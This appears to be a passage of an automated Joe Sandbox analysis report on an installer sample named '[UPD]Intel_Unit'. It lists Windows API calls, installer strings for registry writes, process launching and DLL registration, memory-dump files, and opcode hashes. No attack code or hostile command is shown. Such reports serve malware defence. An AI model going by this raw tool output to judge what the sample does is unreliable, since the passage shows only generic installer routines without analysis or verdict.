                                                                                                                                                                                                                • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
                                                                                                                                                                                                              • WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
                                                                                                                                                                                                              • WriteReg: error creating key "%s\%s", xrefs: 004029F5
                                                                                                                                                                                                              • WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
                                                                                                                                                                                                              • WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
                                                                                                                                                                                                              • WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2258505896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258484932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258527944.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2260018040.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_[UPD]Intel_Unit.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: lstrlen$CloseCreateValuewvsprintf
                                                                                                                                                                                                              • String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
                                                                                                                                                                                                              • API String ID: 1641139501-220328614
                                                                                                                                                                                                              • Opcode ID: 51d35262b0c2a2c9e21de093e360e43a16013741a0d7e0050a8341ec78c57d1d
                                                                                                                                                                                                              • Instruction ID: 4ea7a0066738be70411365ddd6f3e5606018e51d84950e7919a1ab5782edcef9
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 51d35262b0c2a2c9e21de093e360e43a16013741a0d7e0050a8341ec78c57d1d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3D41BFB2D00209BFDF11AF90CE46DAEBBB9EB04704F20407BF505B61A1D6B94B509B59
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
                                                                                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
                                                                                                                                                                                                              • GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
                                                                                                                                                                                                              • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
                                                                                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 00402F17
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
                                                                                                                                                                                                              • DeleteFileW.KERNEL32(?), ref: 00402F56
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • created uninstaller: %d, "%s", xrefs: 00402F3B
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2258505896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258484932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258527944.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2260018040.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_[UPD]Intel_Unit.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                                                                                                                                              • String ID: created uninstaller: %d, "%s"
                                                                                                                                                                                                              • API String ID: 3294113728-3145124454
                                                                                                                                                                                                              • Opcode ID: 7d19fd18931236c609f14dd9ebe02190de13aa3954742adab313f132dac73535
                                                                                                                                                                                                              • Instruction ID: 876417c632a2c352b67fb01c84f3ccb8dada3a759dccfb7ac575e016526b3130
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7d19fd18931236c609f14dd9ebe02190de13aa3954742adab313f132dac73535
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E231B272800115BBCB11AFA4CE45DAF7FB9EF08364F10023AF555B61E1CB794E419B98
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
                                                                                                                                                                                                              • GetFileAttributesW.KERNEL32(0046A560,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040613C
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,0046A560,40000000,00000004), ref: 00406175
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,0046A560,40000000,00000004), ref: 00406181
                                                                                                                                                                                                              • lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00409678,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040619B
                                                                                                                                                                                                              • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,004062D4,00000000), ref: 004061A2
                                                                                                                                                                                                              • WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,004062D4,00000000,?,?,004062D4,00000000), ref: 004061B7
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2258505896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258484932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258527944.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2260018040.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_[UPD]Intel_Unit.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
                                                                                                                                                                                                              • String ID: RMDir: RemoveDirectory invalid input("")
                                                                                                                                                                                                              • API String ID: 3734993849-2769509956
                                                                                                                                                                                                              • Opcode ID: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
                                                                                                                                                                                                              • Instruction ID: 719ae6cd10854ac59b0cdc08190af65770ef99398ad526dd54b0ef62760a23c4
                                                                                                                                                                                                              • Opcode Fuzzy Hash: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4621F271400200BBD710AB64DD88D9B376CEB02370B25C73AF626BA1E1E77449868BAD
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C
                                                                                                                                                                                                                • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                                                                                                                                                                • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                                                                                                                                                                • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                                                                                                                                                                                • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                                                                                                                                                                • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                                                                                                                                                                • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                                                                                                                                                                • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                                                                                                                                                                • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                                                                                                • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
                                                                                                                                                                                                              • FreeLibrary.KERNEL32(?,?), ref: 004024C3
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • Error registering DLL: Could not initialize OLE, xrefs: 004024F1
                                                                                                                                                                                                              • Error registering DLL: Could not load %s, xrefs: 004024DB
                                                                                                                                                                                                              • 1j, xrefs: 00402473
                                                                                                                                                                                                              • Error registering DLL: %s not found in %s, xrefs: 0040249A
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2258505896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258484932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258527944.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2260018040.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_[UPD]Intel_Unit.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
                                                                                                                                                                                                              • String ID: 1j$Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s
                                                                                                                                                                                                              • API String ID: 1033533793-1472690300
                                                                                                                                                                                                              • Opcode ID: dad84e194389b7cbeb1d3ab4357ce8e64ef755489eaa46c5795f6130922e59d8
                                                                                                                                                                                                              • Instruction ID: e967fad4df15afb35ea17a6f8951328f27fda4bee3b51f855042d01f5ead75df
                                                                                                                                                                                                              • Opcode Fuzzy Hash: dad84e194389b7cbeb1d3ab4357ce8e64ef755489eaa46c5795f6130922e59d8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 34219131904208BBCF206FA1CE45E9E7A74AF40314F30817FF511B61E1D7BD4A819A5D
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetWindowLongW.USER32(?,000000EB), ref: 00403DE4
                                                                                                                                                                                                              • GetSysColor.USER32(00000000), ref: 00403E00
                                                                                                                                                                                                              • SetTextColor.GDI32(?,00000000), ref: 00403E0C
                                                                                                                                                                                                              • SetBkMode.GDI32(?,?), ref: 00403E18
                                                                                                                                                                                                              • GetSysColor.USER32(?), ref: 00403E2B
                                                                                                                                                                                                              • SetBkColor.GDI32(?,?), ref: 00403E3B
                                                                                                                                                                                                              • DeleteObject.GDI32(?), ref: 00403E55
                                                                                                                                                                                                              • CreateBrushIndirect.GDI32(?), ref: 00403E5F
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2258505896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258484932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258527944.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2260018040.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_[UPD]Intel_Unit.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2320649405-0
                                                                                                                                                                                                              • Opcode ID: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
                                                                                                                                                                                                              • Instruction ID: efe235911933e34786796033030fc6f48e67331b78f43f6f4bde0ddab4ebbdd0
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7D1166715007046BCB219F78DE08B5BBFF8AF01755F048A2DE886F22A0D774DA48CB94
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                                                                                                • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                                                                                                • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                                                                                                                                                                • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                                                                                                                                                                • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                                                                                                                                                                                • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                                                                                                                                                                • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                                                                                                                                                                • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                                                                                                                                                                • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                                                                                                                                                                • Part of subcall function 00405C3F: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
                                                                                                                                                                                                                • Part of subcall function 00405C3F: CloseHandle.KERNEL32(?), ref: 00405C71
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
                                                                                                                                                                                                              • GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • Exec: failed createprocess ("%s"), xrefs: 004022C2
                                                                                                                                                                                                              • Exec: command="%s", xrefs: 00402241
                                                                                                                                                                                                              • Exec: success ("%s"), xrefs: 00402263
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2258505896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258484932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258527944.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2260018040.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_[UPD]Intel_Unit.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
                                                                                                                                                                                                              • String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
                                                                                                                                                                                                              • API String ID: 2014279497-3433828417
                                                                                                                                                                                                              • Opcode ID: 6d54c557fbd6fdf8dc19518642d08f2325eb4e2a9a3136ddaf8bbf3ddc9e5317
                                                                                                                                                                                                              • Instruction ID: 1f9fd54ce4b92d80b15c686f19ace2d36b15c716f321f29b17dee5dd027f7fd2
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6d54c557fbd6fdf8dc19518642d08f2325eb4e2a9a3136ddaf8bbf3ddc9e5317
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3E11C632904115EBDB11BBE0DE46AAE3A61EF00314B24807FF501B50D1CBBC4D41D79D
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404869
                                                                                                                                                                                                              • GetMessagePos.USER32 ref: 00404871
                                                                                                                                                                                                              • ScreenToClient.USER32(?,?), ref: 00404889
                                                                                                                                                                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 0040489B
                                                                                                                                                                                                              • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048C1
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2258505896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258484932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258527944.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2260018040.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_[UPD]Intel_Unit.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Message$Send$ClientScreen
                                                                                                                                                                                                              • String ID: f
                                                                                                                                                                                                              • API String ID: 41195575-1993550816
                                                                                                                                                                                                              • Opcode ID: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
                                                                                                                                                                                                              • Instruction ID: 7db1728360bf3821ce9645a1193633f180912fe022e8629b13ab7a69f18166cd
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C5015E7290021CBAEB00DBA4DD85BEEBBB8AF54710F10452ABB50B61D0D7B85A058BA5
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
                                                                                                                                                                                                              • MulDiv.KERNEL32(00013E00,00000064,?), ref: 00403295
                                                                                                                                                                                                              • wsprintfW.USER32 ref: 004032A5
                                                                                                                                                                                                              • SetWindowTextW.USER32(?,?), ref: 004032B5
                                                                                                                                                                                                              • SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • verifying installer: %d%%, xrefs: 0040329F
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2258505896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258484932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258527944.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2260018040.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_[UPD]Intel_Unit.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                                                                              • String ID: verifying installer: %d%%
                                                                                                                                                                                                              • API String ID: 1451636040-82062127
                                                                                                                                                                                                              • Opcode ID: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
                                                                                                                                                                                                              • Instruction ID: 2210906da4c477318a924a5c8cf459ae641b3a2c10b729e3aa38b42dd2c8d99c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 98014470610109ABEF109F60DD49FAA3B69FB00349F00803DFA46B51E0DB7996558B58
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • lstrlenW.KERNEL32(00447240,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00447240,?), ref: 0040444A
                                                                                                                                                                                                              • wsprintfW.USER32 ref: 00404457
                                                                                                                                                                                                              • SetDlgItemTextW.USER32(?,00447240,000000DF), ref: 0040446A
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2258505896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258484932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258527944.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2260018040.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_[UPD]Intel_Unit.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                                                                              • String ID: %u.%u%s%s$@rD
                                                                                                                                                                                                              • API String ID: 3540041739-1813061909
                                                                                                                                                                                                              • Opcode ID: 62d1a696c90b95282af5dc14f7046faf50b68b39d5c561db380251ecdb666397
                                                                                                                                                                                                              • Instruction ID: f1896056faf18a44ee7e341cc3389f256aee6b01e91544d35c55ed1e8b934206
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 62d1a696c90b95282af5dc14f7046faf50b68b39d5c561db380251ecdb666397
